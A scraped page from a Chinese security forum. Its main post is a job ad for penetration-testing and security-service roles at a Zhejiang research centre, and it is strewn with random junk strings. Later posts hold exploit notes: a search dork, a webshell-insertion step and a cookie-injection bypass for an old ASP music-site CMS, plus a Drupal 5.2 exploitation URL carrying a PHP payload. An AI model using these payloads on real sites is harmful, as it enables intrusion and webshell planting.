最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 浙江政安信息安全研究中心招贤纳士啦!

  • 招聘职位: 其他职位
  • 公司名称: 浙江政安信息安全研究中心
  • 工作地点: 浙江
  • 专业要求: 计算机专业 
  • 学历要求: 大专
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.sitedirsec.com
  • 简历邮箱: 352113371@qq.com
  • 联系电话: 13000000000
  • 在线QQ: 352113371
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++浙江政安信息安全研究中心相关说明++++++++++

    浙江政安信息安全研究中心招贤纳士啦!3 O: f# S9 U. ]5 c
    简历投递:352113371@qq.com0 O' B: l6 ?/ g3 h5 d' k
    9 w9 Q8 S/ t6 E/ y& G' F0 `
    职位:售前工程师 2名 【7000-15000】
    / A4 ~, e: }' F" \岗位职责:
    / f4 Q  x. Q# i; p$ a+ t! f" W1、配合销售人员参与信息安全咨询服务及安全服务项目(包括渗透测试、漏洞扫描、APP安全测试、应急响应、安全加固、风险评估、安全规划、安全管理咨询等)的售前工作;/ ~% D% S% D4 u) `
    2、配合销售人员准备与用户的技术交流、PPT等技术文件;1 x# e0 P8 _, @8 s
    3、负责信息安全咨询服务及安全服务的实施工作;
    * r5 R* l- }! G# x" ]4、负责信息安全解决方案的售前,对信息安全解决方案项目进行售前技术支持,并协助销售人员跟进项目进度,配合项目的招投标工作(特别是技术方案的编写);
    % F2 l, h4 t0 h* g! h. B8 A# ~5、负责信息安全咨询项目的现场调研、资料搜集、课题研究及用户答疑等工作;7 q( T9 Z$ D' k- L6 x# s
    任职要求:
    " s% w+ A: E# L0 c5 S: s  C1、信息安全及计算机相关专业毕业,正规院校大学本科及以上学历。至少2年以上工作经验、有非常好的语言、文字组织能力;
    & {- A8 B4 W# k2、有较广泛的IT基础知识,熟悉主流应用系统架构,对网络架构、加密认证类设备、网络安全产品深入了解;
    8 p, t* A2 t8 }3 q3、熟悉企业IT规划的方法论和过程;
    & S' @; G' A  f2 H; m& |4、为客户提供过信息安全项目策划,具有丰富的信息安全项目策划和实施经验;
    3 a/ U% H/ R" K& [0 V5、熟练掌握ISO27001等国际国内信息安全管理体系有关标准,掌握或从事过风险评估工作;6 W5 i' T  ?- [- r; ]' t
    6、具有良好的客户沟通能力及技巧;
    4 Q- k" H( T' b6 C+ y7、能适应经常性短期出差;" O3 G. [9 M- G
    8、具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;
    ' t% c6 b+ h# s0 H( Y
    % m; r- ^( j, k4 z$ l5 V, V职位:高级信息与网络安全工程师 3名 【5000-25000】+ j+ e  x9 y) t5 G
    岗位职责:
    6 D6 u0 X$ s4 A/ D* b    常驻政府单位或国有企业用户现场,根据用户需求提供现场信息与网络安全相关的支持服务,具体内容包括日常安全设备巡检、安全风险事件处理和应急响应、应用系统漏洞扫描和渗透测试、系统安全加固等工作。相关事件要求能形成规范的书面文字材料进行汇报。$ w7 \' n3 n( b1 K8 Z, O
    任职条件:
    & a4 a) g8 ^) v+ n1 I1、1-5年以上信息与网络安全相关工作经验。具有CCIE/CISP/CISSP等安全相关证书者优先;具有政府单位、大型企业单位驻场服务经历的优先;最终视工作年限和工作经验确定薪酬。
    - l1 E+ O) x' G9 J4 F+ i2、熟悉路由器、交换机、防火墙、入侵检测等常见网络安全产品;熟悉windows、linux等操作系统;熟悉常见数据库如Oracle、Sql server、My sql等;
    . i7 G0 N7 [, N% N$ m3、对信息安全有兴趣和爱好,具有较强的学习能力。如无CISP证书的要求在入职以后3个月内取得证书。有渗透测试和应用开发经历与经验者优先;
    5 Z+ t" R  z" w, y4、有高度的责任心,能适应工作压力;具有较强的沟通协调能力,良好的口头表达和技术文档撰写能力。面试时要求提供3份以上本人撰写的安全相关技术文档和报告材料。) {6 n: o4 k8 p9 I
    7 ~: ?/ `0 \0 p+ v
    职位: 安全服务工程师 3名 【5000-15000】
    3 n' Q8 [! A" J任职要求:
    3 @# R8 q/ E1 M4 C, Y! ^1. 能力突出者专业学历不限;
    ; `* Q0 S- K" m# f) P4 [4 u( T2. 对网络安全攻防有浓厚的兴趣并愿意为之倾注大量精力,有较强的工作责任心和主动学习能力;+ {4 V0 z: Z) P2 |
    3. 熟练使用PHP、Python、Perl等任意一门编程语言;$ H0 F& R1 n0 _) e% A
    4. 掌握MSSQL、MySQL、Oracle、SQLite等一种或几种主流数据库结构以及语法;
    ; C3 f3 G" [  ~8 X7 f5. 熟练使用各种安全扫描,渗透工具,有丰富的安全渗透经验并能能独立完成渗透测试;
    , c/ K& i: W8 R+ o% o& R6. 熟悉常见Web漏洞产生的原理,熟悉Windows、Linux平台渗透测试、权限提升、后门分析、安全加固等。( V4 G& @4 b$ ~1 P7 s0 p
    优先考虑:& r% V9 Z' ~8 K- ^* h3 G$ D! z. M
    1.有能够进行项目管理、售前工作者,对具体技术能力可以适当降低, |9 x% V6 e" |+ j
    2.熟悉iOS & Android APP 等移动安全测试1 u" @# R' G" R& @1 ?
    3.对智能设备、硬件安全测试有了解,熟悉相关常见协议
    ! S+ \3 ?+ I* E" D  p6 ?1 _4.有代码审计相关经验者,具备逆向分析能力更佳;
    + o; d3 ^" J7 g5. 在漏乌云、洞盒子、补天等漏洞平台提交过相关有效漏洞;
    5 O6 e. R; E( m9 J0 a, y* f8 {6.具有其它可以秒杀面试官能力: c5 u! w" @5 p! L
    7.具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;

     

    您可能还想看的主题:

    安全宝招聘安全服务工程师

    关于信息安全等级保护

    600万用户遭泄密案告破 CSDN首吃信息安全罚单

    Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版

    合优网站管理系统存在SQL注射。。。原创首发~

    启明星辰招聘

    [HR]北京安码科技 信息安全工程师

    [HR]上海四域 信息安全工程师

    《信息安全架构》

    继续信息安全。

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    8603音乐网管理系统v2009.1001漏洞
    8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入

    ) Y( d/ a- D# f
    数据库未作任何处理,可以插入一句话。继续插入经典一句话

    / n: ]9 X' C% ^# u1 r

    5 f* \8 w% `% ?/ w
    Google: inurl:player.asp?classid 打开网页,点击 请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可。数据库地址:/data/%23datalink.asa
    # u/ h3 s. V9 U
    二,classid处可以Cookies注入classid=request("classid")set rs1=server.createobject("adodb.recordset")rs1.open "select * from feilei where classid="&classid,conn,1,3classid=rs1("classid")

    ) s) @' B7 c9 H8 u/ S9 H3 F
    这里多啰嗦几句。关于Cookies注入的问题。有人问寡人那几句代码为什么存在Cookies注入。这个其实寡人在 微尔网站管理系统V1.51的cookies注入 的文章里说过了。这里在啰嗦几下。如有错误,请不吝指正。

    1 q( b1 [  R% d+ R! {
    变量都可以用request来直接取得的,并且是有先后顺序的,譬如你用这样的语句request("id")取得id变量,asp会先从Form过来的数据找变量,然后是QueryString部分,然后是Cookie部分。但是如果你指定了request.cookies("id")就只会从cookie里找变量内容,没有的话就为空,同理,如果用的是request.form("id")就会只从表单里取变量而不会理会其他提交方式中的内容。这三个取得变量的地方也是是我们经常提交数据的地方,并且都是很容易就能修改的,而player.asp他写的是直接request("classid"),并没有指明是那种方式,即使加了防注入,我们也可以突破防注入,用cookies注入,修补办法就是加上request的方法,把request("classid")改为request.queryString("classid"),

    : e3 p( o; ?1 k/ Q  |
    看看防注入页面,防注入页面只对 '----- 对 get query 值 的过滤.和 '-----对 post 表 单值的过滤.

    - [1 y1 Y" i& A0 F# I
    也就是过滤了request.QueryString和request.form的方法,而并没有过滤request.cookies的方法,cookies注

    0 _3 Z  M  C. I
    入也就产生了
    7 u6 _$ l3 M9 `1 d  q  R
    用注入中转。

    - u6 ]" W" B7 ^: {5 E- i* ^& O+ K4 _. l
    * R6 C& L& A& v# K

    ! U* ]  U6 I0 K) [: O2 R' i
    : g+ P4 Z( k. d3 P! N4 e
    0 r* }$ `0 W, I9 e- D9 d
    % G4 V$ d- j! V; Y
    3 g- I4 r/ |" j
    ( U# j* P: o0 `. z6 ], D0 c* s" b3 w4 u
    # n) x6 C# p2 R! `2 g2 `

    7 l( {" e  B$ L% ~  C5 _. [# [3 g2 }" Q- _& l3 l
    $ a4 i2 {: A+ U9 L8 A4 `9 P+ m

    & E/ ~* f! q$ g4 a% E& z3 ]4 x2 X3 J- O; @* _
    0 z4 n: J# ^& K
    + h" y7 Z0 F2 x2 ?# v1 c( p

    & M' O  w% y  I/ f( S. i4 k# P; c3 J公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    发贴看看自己积分,呵呵,好像没有楼猪的多。  Q  Z4 d- i% p
    6 N( ]# ]7 H5 K- ~  ]
    # Z. E  S! d* Z) }2 @9 X
    ) ?# ~  a$ C6 E/ _- H5 E

    ' H/ ]8 r- W1 U" L  w' e* i1 R/ m
    5 w6 y1 O2 m( |. K3 U$ Z  a; i# h+ e3 R- v8 A

    ; b- ?$ {% w7 r/ m0 T4 B% k7 ?! }2 }0 W+ Q- [$ a; b/ ^7 K
    0 U/ e: ?: {0 u6 k' M% ~" H- A
    ! p. y2 j4 b+ N
      j0 K) J$ m/ n5 s

    ; l  w! [% [, N% L( Q6 F0 k4 E4 X- e  C8 r3 t* S4 A( C

    " S  S0 q) @8 E# [5 g+ G# h/ M2 C- ~* L& ]) W/ H" O
    0 G+ r1 _$ n3 @  G" |4 J7 q+ J1 d
    ) p4 D: [2 O, p6 Y6 P8 H+ Q+ C
    * h- m$ ^0 k3 W6 Y
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    php的zend哈希漏洞利用问题
    Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation VectorExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&amp;_menu[items][][type]=-1&amp;-312030023=1&amp;q=1/<?phpinfo();
    $ L$ t/ {& X; @$ X
    7 x3 j% r- z7 A6 n6 g1 W- @
    & |1 i  ?5 a0 |) z( a% I; u+ j* `# s/ F) B$ k( S/ V, l* r- E

    2 U9 O; ]3 t' Z' T: e- \3 F1 |
    ! j& \+ i) {1 }8 `5 l- E
    2 I& \7 V$ ]8 a6 K
    & g( _! b" s. z; n7 f6 M* S3 I3 e4 X' h+ f
    & u/ u& O5 ^6 T" a* N+ [
    8 M. {$ t4 |: N5 k3 ]/ T' N6 F

    3 Q3 L) g4 d. }. D2 W! t: v2 {
    / V  K8 {) r1 e* V0 J
    0 g+ N5 X  a! r, m; d. |- g/ h& k& O  Z2 S& r+ |( h; V; {# F
    * d  D7 {3 H8 \* s5 m

    ( }" \6 V5 A; n6 b6 D" E" y$ K- d4 q. f5 ?" y$ B

    + H+ E  d9 [7 _' S( L% b公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表